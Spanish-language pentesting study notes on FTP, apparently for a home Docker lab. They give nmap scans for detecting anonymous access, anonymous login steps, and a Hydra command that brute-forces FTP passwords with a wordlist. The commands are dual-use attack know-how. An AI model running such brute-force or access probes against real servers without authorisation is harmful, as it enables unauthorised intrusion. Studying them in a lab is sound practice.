Para ingresar al servidor FTP como usuario an贸nimo:
ftp {ip}
anonymous.Docker para un servidor FTP b谩sico:
Repositorio de Docker FTP Server.
[+] ejecutaremos el docker run quitando el public_ip y modificando el ftp user pass para practicar con rockyou
Comando para escaneo con scripts b谩sicos de reconocimiento:
nmap -sCV -p{puerto ftp} {ip}
sCV: Ejecuta detecci贸n de versiones y scripts comunes.p: Especifica el puerto FTP.Uso de script espec铆fico para detectar acceso an贸nimo:
nmap --script ftp-anon.nse -p{puerto ftp} {ip}
ftp-anon.nse: Identifica si el usuario anonymous est谩 habilitado.Para probar contrase帽as mediante fuerza bruta (conocemos el usuario):
hydra -l {usuario} -P {wordlist} ftp://{ip} -t {cantidad_hilos}
l: Especifica el usuario a atacar.P: Ruta a la lista de contrase帽as.ftp://{ip}: Protocolo y direcci贸n IP objetivo.t: Cantidad de hilos para acelerar el proceso.Docker para configurar un servidor FTP con acceso an贸nimo:
Pasos b谩sicos:
ftp-anon.nse.Si sale positivo a anonymous ejecutamos
ftp {ip}
user:anonymous
pass: anonymous
# Acceso FTP an贸nimo
ftp {ip}
# Escaneo b谩sico con Nmap
nmap -sCV -p21 {ip}
# Escaneo con script para usuario an贸nimo
nmap --script ftp-anon.nse -p21 {ip}
# Fuerza bruta con Hydra
hydra -l {usuario} -P {wordlist} ftp://{ip} -t4